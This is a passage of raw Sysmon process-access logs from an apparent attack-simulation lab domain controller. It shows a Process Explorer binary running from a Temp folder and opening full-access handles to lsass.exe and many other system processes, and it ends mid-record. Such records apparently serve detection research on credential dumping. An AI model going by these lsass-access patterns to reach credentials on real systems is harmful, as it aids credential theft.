10341000x8000000000000000792549Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792548Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792547Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792546Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792545Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792544Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792543Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792542Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792541Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792540Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792539Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792538Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792537Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792536Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792535Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792534Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792533Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792662Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792661Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792660Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792659Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792658Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792657Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792656Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792655Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792654Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792653Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792652Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792651Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792650Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792649Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792648Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792647Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792646Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792645Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792644Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792643Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792642Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 